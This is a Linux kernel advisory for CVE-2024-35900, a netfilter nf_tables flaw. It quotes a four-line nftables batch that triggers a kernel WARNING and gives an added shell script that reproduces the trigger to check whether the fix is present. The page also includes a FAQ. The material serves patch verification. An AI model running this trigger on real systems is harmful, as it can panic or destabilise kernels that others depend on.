CVE-2024-35900: netfilter: nf_tables: reject new basechain after table flag update
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: reject new basechain after table flag update
The Linux kernel CVE team has assigned CVE-2024-35900 to this issue.
Upstream advisory: https://lore.kernel.org/linux-cve-announce/2024051952-CVE-2024-35900-c2c9@gregkh/T
Other sources
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: reject new basechain after table flag update
When dormant flag is toggled, hooks are disabled in the commit phase by iterating over current chains in table (existing and new).
The following configuration allows for an inconsistent state:
add table x
add chain x y { type filter hook input priority 0; }
add table x { flags dormant; }
add chain x w { type filter hook input priority 1; }
which triggers the following warning when trying to unregister chain w, which is already unregistered.
[ 127.322252] WARNING: CPU: 7 PID: 1211 at net/netfilter/core.c:501 nf_unregister_net_hook+0x21a/0x260
[...]
[ 127.322519] Call Trace:
[ 127.322521] <TASK>
[ 127.322524] ? __warn+0x9f/0x1a0
[ 127.322531] ? nf_unregister_net_hook+0x21a/0x260
[ 127.322537] ? report_bug+0x1b1/0x1e0
[ 127.322545] ? handle_bug+0x3c/0x70
[ 127.322552] ? exc_invalid_op+0x17/0x40
[ 127.322556] ? asm_exc_invalid_op+0x1a/0x20
[ 127.322563] ? kasan_save_free_info+0x3b/0x60
[ 127.322570] ? nf_unregister_net_hook+0x6a/0x260
[ 127.322577] ? nf_unregister_net_hook+0x21a/0x260
[ 127.322583] ? nf_unregister_net_hook+0x6a/0x260
[ 127.322590] ? nf_tables_unregister_hook+0x8a/0xe0 [nf_tables]
[ 127.322655] nft_table_disable+0x75/0xf0 [nf_tables]
[ 127.322717] nf_tables_commit+0x2571/0x2620 [nf_tables]
— NVD
Linux Kernel is vulnerable to a denial of service, caused by a flaw when trying to unregister an already unregistered chain. By sending a specially crafted request, a local authenticated attacker could exploit this vulnerability to cause a denial of service condition.
— IBM
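The trigger quoted above is easy to turn into a reproduction and a patch check. The script below is an added example, not part of the advisory, the kernel tree or the nftables project: it writes the four-line batch from the commit message to a file, submits it as a single transaction with nft -f, and classifies the outcome. A kernel with the fix rejects the batch; this example assumes the rejection errno is EINVAL, which nft prints as "Invalid argument". An unpatched kernel accepts the batch and the commit phase logs the WARNING from nf_unregister_net_hook shown above. Further assumptions: the nft command-line tool and dmesg are available, the script runs as root on a throwaway test VM (on an unpatched kernel it deliberately puts the kernel into the inconsistent state the advisory describes, and with kernel.panic_on_warn=1 the WARNING is a panic), and no table named x exists in the ip family, which is the family "add table x" defaults to. The function names and the verdict words are mine.

```shell
#!/bin/sh
# Added example for CVE-2024-35900 (not from the advisory or the nftables
# project). Reproduces the trigger from the fix's commit message and reports
# whether the running kernel rejects it. Root-only; use a throwaway VM.

# The batch from the commit message, verbatim: the table's flags are updated
# and a new base chain is added inside the same transaction.
ruleset_text() {
    cat <<'EOF'
add table x
add chain x y { type filter hook input priority 0; }
add table x { flags dormant; }
add chain x w { type filter hook input priority 1; }
EOF
}

# Map what can be observed to a verdict. Pure shell, so it can be exercised
# without root or a vulnerable kernel.
#   $1  exit status of "nft -f"
#   $2  what nft wrote to stderr
#   $3  kernel log lines produced while the batch was committed
# Prints one word:
#   rejected      kernel refused the batch with EINVAL (assumed fix behaviour)
#   vulnerable    batch accepted and the commit phase hit the WARNING
#   inconclusive  batch accepted, no WARNING seen (log unreadable?)
#   error         nft failed for an unrelated reason (not root, no nft, ...)
classify_result() {
    nft_status=$1
    nft_stderr=$2
    kernel_log=$3
    if [ "$nft_status" -eq 0 ]; then
        case $kernel_log in
            *WARNING*nf_unregister_net_hook*) echo vulnerable ;;
            *) echo inconclusive ;;
        esac
    else
        case $nft_stderr in
            *"Invalid argument"*) echo rejected ;;
            *) echo error ;;
        esac
    fi
}

# Submit the batch as one transaction and classify the outcome.
# Exit status 0 means the kernel rejected the batch (fix present).
run_check() {
    if nft list table ip x >/dev/null 2>&1; then
        echo "table ip x already exists; refusing to touch it" >&2
        return 2
    fi
    tmp=$(mktemp) || return 2
    ruleset_text >"$tmp"
    # Marker so that only log lines written after this point are examined.
    marker="cve-2024-35900-check-$$"
    echo "$marker" >/dev/kmsg 2>/dev/null
    if nft_err=$(nft -f "$tmp" 2>&1 >/dev/null); then nft_rc=0; else nft_rc=$?; fi
    rm -f "$tmp"
    klog=$(dmesg 2>/dev/null | sed -n "/$marker/,\$p")
    verdict=$(classify_result "$nft_rc" "$nft_err" "$klog")
    # Remove whatever the batch created; a no-op if the batch was rejected.
    # The table is dormant at this point, so no hooks are touched on delete.
    nft delete table ip x 2>/dev/null
    echo "$verdict"
    [ "$verdict" = rejected ]
}

# Only perform the live check when explicitly asked; running the file without
# arguments just defines the functions.
if [ "${1:-}" = "--run" ]; then
    run_check
fi
```

Run it as "sh check.sh --run" on the VM under test. The verdict "rejected" is the only one that says the fix is present; "error" means the batch failed for a reason unrelated to the fix (check that nft is installed and that you are root), and "inconclusive" usually means dmesg could not be read, in which case look at the kernel log by other means before drawing a conclusion.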
Frequently Asked Questions
What is the severity of CVE-2024-35900?
The sources quoted above describe a denial of service, not code execution or information disclosure. A local user who can submit nftables transactions (this requires CAP_NET_ADMIN, which an unprivileged user namespace can provide on kernels that allow them) can leave a table in an inconsistent state, so that the commit phase tries to unregister a base chain hook that was never registered and hits the kernel WARNING shown above. On systems that set panic_on_warn, that WARNING is a kernel panic.
How do I fix CVE-2024-35900?
Run a kernel that contains the upstream fix commit "netfilter: nf_tables: reject new basechain after table flag update"; the upstream advisory linked above lists the mainline and stable releases that carry it. On a distribution kernel, confirm through the vendor's security tracker that the fix has been backported, since distribution version numbers do not map directly onto upstream ones.
What versions of the Linux kernel are affected by CVE-2024-35900?
Kernels that have the dormant-flag commit-phase handling described above but not the fix are affected; the upstream advisory linked above lists the affected and fixed versions for each stable branch. A kernel that accepts the configuration quoted above, instead of rejecting the new base chain, does not carry the fix.
Who is responsible for addressing CVE-2024-35900?
The Linux kernel CVE team assigns and announces identifiers for kernel fixes; the fix itself was written and merged by the netfilter subsystem maintainers. Distribution vendors are responsible for backporting it to the kernels they ship, and system owners for deploying the updated kernel.
Are there any workarounds for CVE-2024-35900?
None of the sources quoted above describes a workaround, so the fix is to update. Because triggering the bug requires the right to submit nftables transactions, restricting who can obtain CAP_NET_ADMIN (for example by disabling unprivileged user namespaces where they are not needed) limits exposure but does not remove the defect.